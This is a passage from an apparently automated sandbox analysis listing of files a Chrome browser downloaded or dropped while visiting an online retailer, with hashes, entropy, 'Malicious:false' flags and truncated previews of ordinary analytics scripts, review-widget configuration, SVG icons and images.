                                                                                                                                                                                    Preview:var sharedLib={EncodingUtils:{}};sharedLib.EncodingUtils.urlBase64ToUint8Array=function(a){a=(a+(c="=".repeat((4-a.length%4)%4))).replace(/\-/g,"+").replace(/_/g,"/"),a=atob(a);for(var c=new Uint8Array(a.length),b=0;b<a.length;++b)c[b]=a.charCodeAt(b);return c},sharedLib.EventTypes={CustomEvent:"ce",InAppPurchase:"p",PushClickEvent:"pc",PushCategoryActionEvent:"ca",PushDeliveryEvent:"pd",InternalEvent:"i",InternalErrorEvent:"ie",ContentCardImpressionEvent:"cci",ControlContentCardImpressionEvent:"ccic",ContentCardClickEvent:"ccc",ContentCardDismissEvent:"ccd",SessionStartEvent:"ss",SessionEndEvent:"se",InAppMessageImpressionEvent:"si",InAppMessageClickEvent:"sc",InAppMessageButtonClickEvent:"sbc",InAppMessageDisplayFailureEvent:"sfe",ControlInAppMessageImpressionEvent:"iec",LocationRecorded:"lr",Alias:"uae",CardImpressionEvent:"ci",CardClickEvent:"cc",LocationCustomAttributeAddEvent:"lcaa",LocationCustomAttributeRemoveEvent:"lcar",CustomAttributeArrayIncrementEvent:"inc",CustomAttribute
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):393
                                                                                                                                                                                    Entropy (8bit):5.13232724082112
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:tnrZ3umc4slZ8CirSl496RSM4jHiqHpumqZllUR4t6FfT0qtv4FuCLrdGos+t5Ap:trZ3uBCrjHiqHchllUqtu9tvuVQ+n8b
                                                                                                                                                                                    MD5:0A17A7ED311E249EDE29E60C295D176A
                                                                                                                                                                                    SHA1:8CEE02F0D4A148B836F01EC5382897BCD83FAC12
                                                                                                                                                                                    SHA-256:3577D8A0692996608D15BD647FD41A2F3798C17A40024B2E123951EE78BD8A37
                                                                                                                                                                                    SHA-512:A9B53B3E571B3FBBC610C4B1379DE15C61F76C54D5D8DB5EB95C13FC1CCE33AF63C9290272A8B67D2A8F8FD01EBF71231DA162D278AA85C304D3C6AC317A1685
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="16" height="17" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)" stroke="#2F3337" stroke-width="1.25" stroke-miterlimit="10" stroke-linecap="round" stroke-linejoin="round"><path d="M8.5 16a7 7 0 1 0 0-14 7 7 0 0 0 0 14Z"/><path d="M8.5 5v4h4"/></g><defs><clipPath id="a"><path fill="#fff" transform="translate(0 .5)" d="M0 0h16v16H0z"/></clipPath></defs></svg>
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):24200
                                                                                                                                                                                    Entropy (8bit):5.116595576774217
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:ta89KHPCMeGyWrqP7CHxvGqxeEZ97K1aM:trKH/7+mHxvGKtY
                                                                                                                                                                                    MD5:27332F15A0E9BCD17976072ED9DA39D4
                                                                                                                                                                                    SHA1:B52FEF6B67F87E2CC930B4E5D0C76F82E0B01FF6
                                                                                                                                                                                    SHA-256:24B5565F666CC2671C728431F76FFE76E0AAC28118CCC02A2DF398BAEEE3E3E7
                                                                                                                                                                                    SHA-512:95E409D5E0E61A82343535D765EBAE129B76F7A23A9700B18A16D876FEA96E3C554C56107E70BBD1B9A184DE46E7A409E871BECC782868A4985C2CDFC1D8B66B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ui.powerreviews.com/api/m/1280018588/l/en_US/configuration?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3
                                                                                                                                                                                    Preview:{"localizations":{"review_display.4.0.snapshot.rating_count_plural":"{0} Star Ratings","review_display.4.0.share_your_photo.confirmation.message":"Your photo has been submitted for approval. \nCheck back soon to see it live!","review_display.4.0.sorting.lowest_rated_label":"Lowest Rated","review_display.4.0.flagging.form_label":"What's the issue?","qa_display.4.0.search.no_results.header":"No results but.","review_display.4.0.badging.verified_reviewer_asset":"","review_display.4.0.flagging_form.email_error":"Email address is required","qa_display.4.0.button.ask_question":"Ask a Question","qa_display.4.0.search.input.placeholder":"Search for...","review_display.4.0.translation.revert_button":"Show original","review_display.4.0.common.yes":"Yes","qa_display.4.0.button.show_more":"Show more","review_display.4.0.flagging_form.button_label.flag":"Flag","review_display.4.0.common.by":"By","review_display.4.0.filtering.dropdown_v2.mobile_modal.submit_filters":"See Results","review_display.4
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4
                                                                                                                                                                                    Entropy (8bit):2.0
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:H:H
                                                                                                                                                                                    MD5:B326B5062B2F0E69046810717534CB09
                                                                                                                                                                                    SHA1:5FFE533B830F08A0326348A9160AFAFC8ADA44DB
                                                                                                                                                                                    SHA-256:B5BEA41B6C623F7C09F1BF24DCAE58EBAB3C0CDD90AD966BC43A45B44867E12B
                                                                                                                                                                                    SHA-512:9120CD5FAEF07A08E971FF024A3FCBEA1E3A6B44142A6D82CA28C6C42E4F852595BCF53D81D776F10541045ABDB7C37950629415D0DC66C8D86C64A5606D32DE
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:true
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2175
                                                                                                                                                                                    Entropy (8bit):4.196647615052
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NqwlRmJTwgqeETa0UIZQskxfzmSiDlOH1LAvpbw/Gj:NPmBoUIasEfzmZDlc1MvpXj
                                                                                                                                                                                    MD5:3C5C4CDA8B10AA6D074321D08486D33C
                                                                                                                                                                                    SHA1:00D96B268B9E3EC3C463EB563A5D2C5CADD296AB
                                                                                                                                                                                    SHA-256:ED7C5A2B773F353E27C8CF3CBC71EA44E75EDB6F82B8A7FA5E6DB4FC140212CD
                                                                                                                                                                                    SHA-512:99B05E73C2FBD7D3711EE38EBFEB2EFCD912E0F2BCD6A3BB85388522EED7A11309135964443AD7D501DA25CE020F8F567EF8391706D7B5AA1184FF78B77AF2F7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="48" height="49" viewBox="0 0 48 49" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M45.4611 17.6983V45.2258C45.4611 46.2346 44.6433 47.0523 43.6346 47.0523V47.0523M45.4611 17.6983L40.2426 13.654M45.4611 17.6983L40.2426 22.1878M40.2426 13.654V9.21831C40.2426 8.06548 39.308 7.13092 38.1552 7.13092H32.1539M40.2426 13.654V22.1878M32.1539 7.13092L25.2267 1.74304C24.4681 1.15306 23.4048 1.15719 22.6508 1.75305L15.8462 7.13092M32.1539 7.13092H15.8462M15.8462 7.13092H9.84494C8.6921 7.13092 7.75754 8.06548 7.75754 9.21831V13.654M7.75754 13.654L2.53906 17.6983M7.75754 13.654V22.1878M2.53906 17.6983V45.3563C2.53906 46.293 3.29839 47.0523 4.23507 47.0523V47.0523M2.53906 17.6983L7.75754 22.1878M4.23507 47.0523L20.2819 32.7244M4.23507 47.0523H43.6346M20.2819 32.7244L22.6323 34.5564C23.3956 35.1514 24.4679 35.1436 25.2225 34.5376L27.4803 32.7244M20.2819 32.7244L7.75754 22.1878M27.4803 32.7244L43.6346 47.0523M27.4803 32.7244L40.2426 22.1878" stroke="#2F3337" stroke-width="2.08889
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (21468)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):21625
                                                                                                                                                                                    Entropy (8bit):5.3491863162376205
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:Oa6/BkmIoJszJpVmqyQBYksQt2oqwZHiNtmIQcEafpe602t/9:ObMGqtHiNkIwa7D7
                                                                                                                                                                                    MD5:2D0937E23561575439EED5E8C7BB9614
                                                                                                                                                                                    SHA1:278FA8727E4E6A5CD03441754F239523BE30318A
                                                                                                                                                                                    SHA-256:2516921CD1002C695846942CE0D42DF5DB33C33803198827F5A24DE3D1246CAC
                                                                                                                                                                                    SHA-512:FD86DBA77F7A2D74C1F044DA856BBB8FC9223534AE0033113C13B88782406174B2EBED84D33F3768B09997B1328E7B370A1EC0B3561D4F40377454FB5DA8B6A7
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://prod.accdab.net/cdn/cs/kqScQcdGSSaI3dBtp4jwEFQjXsQ.js
                                                                                                                                                                                    Preview:/** @license. Uses code from stringencoders and fingerprintjs2. See https://prod.accdab.net/static/js/uba_opensource_readme.txt for license information.. */.!function(t){"use strict";try{!function(t){var e,n,r,i,a,o,u,s,c,l={beacon:{domain:"https://prod.accdab.net",url:"https://prod.accdab.net/beacon",session_ttl:60,frame_source:"https://prod.accdab.net/beacon/bf/bf.html?v=202009_01",api_ns:null},token:{ttl:60,key:"_bcntkn",client_key:"_bcnctkn",form_id:"_bcnToken"},client:{id:"kqScQcdGSSaI3dBtp4jwEFQjXsQ",forms:[]},events:{send_interval:1e4,max_page_buffer_time:2e4,max_page_buffer_size_bytes:1048576,mtrk_threshold:{time:250,dist:50},strk_threshold:{time:250}},dvc:{host:"www.cdn-net.com",sid:"306fdaffb6c5a968",flags:null,to:500,ns:null}},f=(n=t.navigator,r="Microsoft Internet Explorer"===n.appName,i=(e=/MSIE ([0-9]{1,}[.0-9]{0,})/.exec(n.userAgent))?parseFloat(e[1]):0,!r||r&&i>=9),d=(u=(o=function(t){return void 0!==t})((a=t).Prototype)&&a.Prototype.Version<"1.7"&&o(Array.prototype.toJ
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):125207
                                                                                                                                                                                    Entropy (8bit):3.7199219664278846
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:e8B8+l26agbvW5F69HRD3NHiX0H8rAVLtHuJyxejw1w4ZnQVXIYJ9nF:huAU
                                                                                                                                                                                    MD5:C02E9199307190AA888F31B4ABB38529
                                                                                                                                                                                    SHA1:3DA6895FC485DC10D19799BABA697831B8407B9F
                                                                                                                                                                                    SHA-256:2FCC03897FD7A0DC79EAA6A02380F53711F9C7BEA94100F4FE4EAC38B6A9AD88
                                                                                                                                                                                    SHA-512:ADC04441D8E286E083311BB5E96367C3BA4E8873C58E51CAB7FF6AFF321299502052BB4012EC7CDD02C638B239A160504A98DD78CDF47083325DBEC9299EE288
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/img/mxc/09052024-MOPS-Angi-Domestic_Desktop_A7.svg
                                                                                                                                                                                    Preview:<svg width="805" height="447" viewBox="0 0 805 447" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_2165_728)">.<rect x="118.843" y="322" width="172.397" height="48" rx="4" fill="#FFC84C"/>.<path d="M155.478 338.72H157.378V351.4H164.938V353H155.478V338.72ZM173.492 346.84C173.465 346.44 173.372 346.06 173.212 345.7C173.065 345.34 172.858 345.033 172.592 344.78C172.338 344.513 172.032 344.307 171.672 344.16C171.325 344 170.938 343.92 170.512 343.92C170.072 343.92 169.672 344 169.312 344.16C168.965 344.307 168.665 344.513 168.412 344.78C168.158 345.047 167.958 345.36 167.812 345.72C167.665 346.067 167.578 346.44 167.552 346.84H173.492ZM175.132 349.72C174.905 350.88 174.405 351.753 173.632 352.34C172.858 352.927 171.885 353.22 170.712 353.22C169.885 353.22 169.165 353.087 168.552 352.82C167.952 352.553 167.445 352.18 167.032 351.7C166.618 351.22 166.305 350.647 166.092 349.98C165.892 349.313 165.778 348.587 165.752 347.8C165.752 347.013 165.872 346.293 166.112 345.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:PNG image data, 50 x 93, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):61
                                                                                                                                                                                    Entropy (8bit):4.068159130770306
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:yionv//thPl9Ggskkxl/k4E08up:6v/lhPugskk7Tp
                                                                                                                                                                                    MD5:E0863912F97D44D1A082536ED5C1846B
                                                                                                                                                                                    SHA1:F1EE18E2DA26D0D39031FF1E2E541F68D6B6EFF0
                                                                                                                                                                                    SHA-256:6F0DD3D856B7392E8E2D24524CD2513F0948EDE5BFEFA65D179A801B34B097DB
                                                                                                                                                                                    SHA-512:A4D8CD5E7246F64F392776B2DC4D33D9D35AF42B758696A612A8AFC81BFA4AB1A4BB79AA6648207E4559CD74D603A40CD104933EB8C7975A87307B0CCBC82E3E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8dabb6402d244656/1730294525249/gvBFDuekqwNxOkq
                                                                                                                                                                                    Preview:.PNG........IHDR...2...].....h..i....IDAT.....$.....IEND.B`.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (33053), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):33053
                                                                                                                                                                                    Entropy (8bit):5.188187057455003
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:MEcHlQXprkgGrAmooeS+otFiVoegF2mU/lcxb59FCwOP9rP7wFSXOFSl4QJXNmxa:MEcH8ozOP9rvmxoeNmvn
                                                                                                                                                                                    MD5:A1A66FC12EF62C03D5B00CF666CE1B28
                                                                                                                                                                                    SHA1:A2459C8937399919061E1BB1D756A6F7CAB2BC98
                                                                                                                                                                                    SHA-256:2E35F0F4B80A5D3961802EE7AFEF160BC0AC24E235C3252EAD1BFC78BEF15B26
                                                                                                                                                                                    SHA-512:66EAECD5CC175FDCD327FA2131C8F539B6B55990B39D3B84F06F36169759C9FB007662714A24D9C8144673E1E6DFC9DE440643CEC37CF49C79DECC358FE53C7B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://ak1.ostkcdn.com/static/ostk-user-tracking-all.5.0.4.min.2e35f0f4b80a5d3961802ee7afef160bc0ac24e235c3252ead1bfc78bef15b26.js
                                                                                                                                                                                    Preview:var LZString=function(){var m=String.fromCharCode,n="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",a="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-$",r={};function o(t,e){if(!r[t]){r[t]={};for(var n=0;n<t.length;n++)r[t][t.charAt(n)]=n}return r[t][e]}var s={compressToBase64:function(t){if(null==t)return"";var e=s._compress(t,6,function(t){return n.charAt(t)});switch(e.length%4){default:case 0:return e;case 1:return e+"===";case 2:return e+"==";case 3:return e+"="}},decompressFromBase64:function(e){return null==e?"":""==e?null:s._decompress(e.length,32,function(t){return o(n,e.charAt(t))})},compressToUTF16:function(t){return null==t?"":s._compress(t,15,function(t){return m(t+32)})+" "},decompressFromUTF16:function(e){return null==e?"":""==e?null:s._decompress(e.length,16384,function(t){return e.charCodeAt(t)-32})},compressToUint8Array:function(t){for(var e=s.compress(t),n=new Uint8Array(2*e.length),a=0,r=e.length;a<r;a++){var o=e.charCodeAt(a);n[2
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):68229
                                                                                                                                                                                    Entropy (8bit):5.494770670942192
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:SE1aJyZYZO8ftZLbLvNu6Y2qmtZuVOadQ9N6WVM2eYAtpulOaNA9N6QSAfpRpbCn:SE1aJmkfbaRiNQfpRooW
                                                                                                                                                                                    MD5:36718D08B950749254A8AFB4E0AB2DBA
                                                                                                                                                                                    SHA1:C9D55AA7C311613B7327A7C282CB8CEEE9750CAA
                                                                                                                                                                                    SHA-256:0E6522F2DF053EA335CFE828517FEE4087C73A8365117124A90571D37236C19F
                                                                                                                                                                                    SHA-512:1D792C9B6B0EB800927980F73F2FF77C381F155D309660A8ED6B5E0B53B48B0617720FB3ED7F9C49D730880945A38CF2772531759A7BCD6F864DC16BB5DCD033
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[735],{4184:function(e,t){var n;!function(){"use strict";var r={}.hasOwnProperty;function i(){for(var e=[],t=0;t<arguments.length;t++){var n=arguments[t];if(n){var o=typeof n;if("string"===o||"number"===o)e.push(n);else if(Array.isArray(n)){if(n.length){var a=i.apply(null,n);a&&e.push(a)}}else if("object"===o){if(n.toString!==Object.prototype.toString&&!n.toString.toString().includes("[native code]")){e.push(n.toString());continue}for(var l in n)r.call(n,l)&&n[l]&&e.push(l)}}}return e.join(" ")}e.exports?(i.default=i,e.exports=i):void 0===(n=function(){return i}.apply(t,[]))||(e.exports=n)}()},8566:function(e,t,n){"use strict";var r=n(930),i=n(5696),o=n(7980);Object.defineProperty(t,"__esModule",{value:!0}),t.default=function(e){var t,n=e.src,l=e.sizes,c=e.unoptimized,h=void 0!==c&&c,m=e.priority,C=void 0!==m&&m,L=e.loading,S=e.lazyRoot,N=void 0===S?null:S,_=e.lazyBoundary,O=e.className,A=e.quality,M=e.width,R=e.height,j=e.style,I
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ISO Media, AVIF Image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3288
                                                                                                                                                                                    Entropy (8bit):7.304641587743194
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:rGzLvIl/XOd6sVOepy9ijbMjk1n9Elmd:rG0OksYeqiImL
                                                                                                                                                                                    MD5:64E7B62B1561233121A807B41EECFD95
                                                                                                                                                                                    SHA1:D60A5D12543C48DD747CD022856492AFDAA9D13A
                                                                                                                                                                                    SHA-256:5440F536BBA886E43C79EA8A740F26D4ECF0E1FBD951968BEE4FD77EF6007F72
                                                                                                                                                                                    SHA-512:3A178A52F66B15B6BDA6A7185CB4C17578815BFC1CD7CB2B7A57E4FC8A18C2ED6F2E30755A7E896662B1FF74AFE8D49C6DAC629C847E2292F5E508800BB65C12
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/collections/McCallister-Oatmeal-Tweed-Fabric-Seating-by-iNSPIRE-Q-Artisan-c0ddd0e0-f7db-4df0-a305-0c6c86886fcc.jpg?v=1713206573&width=250
                                                                                                                                                                                    Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm.........4iloc....D@...................*.....................8iinf..........infe........av01.....infe........Exif.....iprp....ipco....colrrICC....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.............av1C........ispe................pixi............ipma...................iref........cdsc..........mdat.......~Y !..2...... .. ..J......>d...Vg..E....cP'.1..[.&G......$....A.1/.t..>.W...#AT.......q..\P.rV.}Bk....4.\..|^...3..j`....dj.da........9..+=.P.....p.;.s"Mh..%.B.b..zxuzF..(O..F.XrC.lT..X....?6.....jg....Wx.K...Q.%F.;..&._..2..\I.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1789), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1789
                                                                                                                                                                                    Entropy (8bit):5.177113566186224
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:uBG6L4YisqwTNjscsEdBZxCriQb6sL9isUx9ocpOBbS3DXQCzBbdByBQJD:uM6hTZs0BZA+U6wosU/1pOB+3DXHBZBd
                                                                                                                                                                                    MD5:33A4A0842739201FE8D314C6C48BF408
                                                                                                                                                                                    SHA1:1AB8D77E4D86FCA4882F24D9405A673E8EF0FD73
                                                                                                                                                                                    SHA-256:FF1082D7C1F055F71565D47208D92F4D8E4FEA909B02DDFC267D9C05F0E37475
                                                                                                                                                                                    SHA-512:EA2C07B574A7D01120924C956AA934B974143E83EC8C404CC9B5AF890BF268BB05B07F1A5D5505F337C21222D016BA279722658B9C1B3C4C29421DC50118749E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://js.appboycdn.com/shopify-scripts/0.2.0/braze-cart-script.min.js?api_key=f835946b-0d19-4768-88b1-9c8df850c4bc&sdk_url=sdk.iad-03.braze.com&shop=26f4aa-09.myshopify.com&shop=26f4aa-09.myshopify.com
                                                                                                                                                                                    Preview:(function(t,c){const n=document.documentElement.innerHTML.includes("BrazeWebSdkScript.js");if(n){return}if(typeof c!=="function")return;function i(){var t=null;if(window.braze!==undefined){t=window.braze}else if(window.appboy!==undefined){t=window.appboy}return t}function a(){const t=new URL([...document.getElementsByTagName("script")].map(t=>t.src).find(t=>t.includes("braze-cart-script")));const n=new URLSearchParams(t.search);return Object.fromEntries(n.entries())}function s(t,n){const e=decodeURIComponent(t);const r=e.indexOf(n);if(r!==-1){return e.substring(0,r)}return t}function e(t){var n=t+"=";var e=document.cookie.split(";");for(var r=0;r<e.length;r++){var o=e[r];while(o.charAt(0)==" ")o=o.substring(1,o.length);if(o.indexOf(n)==0)return o.substring(n.length,o.length)}return null}function r(e){const r=s(e,"?key=");const o=localStorage.getItem("cart_token");i().getDeviceId(function(t){if(e!=null&&r!=o){localStorage.setItem("cart_token",r);const n=a();c("https://"+n["sdk_url"]+`/a
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):3715
                                                                                                                                                                                    Entropy (8bit):7.488951573086458
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:NBIl/Xrx2LptPH1xfcrr+HdodbBdvYrBpuG7fBb5M1Cq:N28PHDir+Hdod+1l7fDMN
                                                                                                                                                                                    MD5:5E6677F313F6F4E16C420A4C0308F702
                                                                                                                                                                                    SHA1:EA78B9FD2272E67B348511B35C341E58ADBE5771
                                                                                                                                                                                    SHA-256:1F2F9962FDC9B35196D6A3F4A4476AA81C09401CED14C3F3EB56B0BB485928B7
                                                                                                                                                                                    SHA-512:D030F3D81B260FD6DEAA68D53358588159DDDEDF782B2C0370D492B4F938C7D2ACBA5E4387927D95D5BC021372A83D0C52712B320AD9F6106CA093B6BF1CB989
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................P...........P...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......P.P....................................................................................Iq..Q.."..H.D.e...H..U..QkV..:....iZ.;....u=....5eD...i.._..)..z....z...}*uc.;oYb....l@...x....S..Fe.E.d&B.d..%Q.`(.;.P..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4926), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4926
                                                                                                                                                                                    Entropy (8bit):5.835102178112797
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:1gWUfvlcY021mvn1blhad7OIJoodnbUp2dEjkRU8WmE5i6X:1DY0hf1bT47OIqWb1RWml6X
                                                                                                                                                                                    MD5:A1AA81032B4F363FA8242159C6C387F3
                                                                                                                                                                                    SHA1:4CEE243633E77C57A423F70A3A1A05B7B96F4164
                                                                                                                                                                                    SHA-256:9FE66BB1C8EA5A8FC16263FE0D3AB1540752CACBC5AEA9C9F7EB5E1E4166FBE7
                                                                                                                                                                                    SHA-512:3DACF76840E7F90274D9C0100C182643FC50CDBD63B84747857A836BF687FF66F52FC7DACE76813BF86DAC6F5E6E6EEB2F321E8F08670F03BB8A902C7167AB8A
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(function(){var s = {};(function(){var h=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,d){if(a==Array.prototype||a==Object.prototype)return a;a[b]=d.value;return a};function k(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var d=a[b];if(d&&d.Math==Math)return d}throw Error("Cannot find global object");} var m=k(this),p=typeof Symbol==="function"&&typeof Symbol("x")==="symbol",t={},v={};function w(a,b,d){if(!d||a!=null){d=v[b];if(d==null)return a[b];d=a[d];return d!==void 0?d:a[b]}} function x(a,b,d){if(b)a:{var c=a.split(".");a=c.length===1;var e=c[0],g;!a&&e in t?g=t:g=m;for(e=0;e<c.length-1;e++){var f=c[e];if(!(f in g))break a;g=g[f]}c=c[c.length-1];d=p&&d==="es6"?g[c]:null;b=b(d);b!=null&&(a?h(t,c,{configurable:!0,writable:!0,value:b}):b!==d&&(v[c]===void 0&&(a=Math.random()*1E9>>>0,v[c]=p?m.Symbol(c):"$jscp$"+a+"$"+c),h(g,v[c],{co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (1117)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4790
                                                                                                                                                                                    Entropy (8bit):5.261056851891377
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:pnR1QEnN5ejImVB/b1ybFCe249zz7DdE/pbfnKfIfkdIMW1KQJUG6+hXNjNzmHpa:pnFnNojImVVMbFxEhbnKfIfkD3G6+hXZ
                                                                                                                                                                                    MD5:8E3E64F462873A83DA2DD6BF0B5A4DC8
                                                                                                                                                                                    SHA1:874EBEAF968E91CE28F7D552B0A8D7258D072EDE
                                                                                                                                                                                    SHA-256:14A57415F5C9858B76F7FA75C63BAFCA79AE40B88D2E7724E68CB927015EBEA8
                                                                                                                                                                                    SHA-512:FB3F2F178A65452E4B91D56C6B5CA5C2543B490D25AD1E786B5B1FA96041242FF254C8D881DD6A44EEC205BDCC4E91479CEA84EF3AE0FF33F15A907A9EC95771
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview://tealium universal tag - utag.251 ut4.0.202409301659, Copyright 2024 Tealium.com Inc. All Rights Reserved..window["MovableInkTrack"]="mitr";window["mitr"]=window["mitr"]||function(){(window["mitr"].q=window["mitr"].q||[]).push(arguments);};try{(function(id,loader){var u={"id":id};utag.o[loader].sender[id]=u;if(utag.ut===undefined){utag.ut={};}.var match=/ut\d\.(\d*)\..*/.exec(utag.cfg.v);if(utag.ut.loader===undefined||!match||parseInt(match[1])<41){u.loader=function(o,a,b,c,l,m){utag.DB(o);a=document;if(o.type=="iframe"){m=a.getElementById(o.id);if(m&&m.tagName=="IFRAME"){b=m;}else{b=a.createElement("iframe");}o.attrs=o.attrs||{};utag.ut.merge(o.attrs,{"height":"1","width":"1","style":"display:none"},0);}else if(o.type=="img"){utag.DB("Attach img: "+o.src);b=new Image();}else{b=a.createElement("script");b.language="javascript";b.type="text/javascript";b.async=1;b.charset="utf-8";}if(o.id){b.id=o.id;}for(l in utag.loader.GV(o.attrs)){b.setAttribute(l,o.attrs[l]);}b.setAttribute("src",o
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (11714), with no line terminators
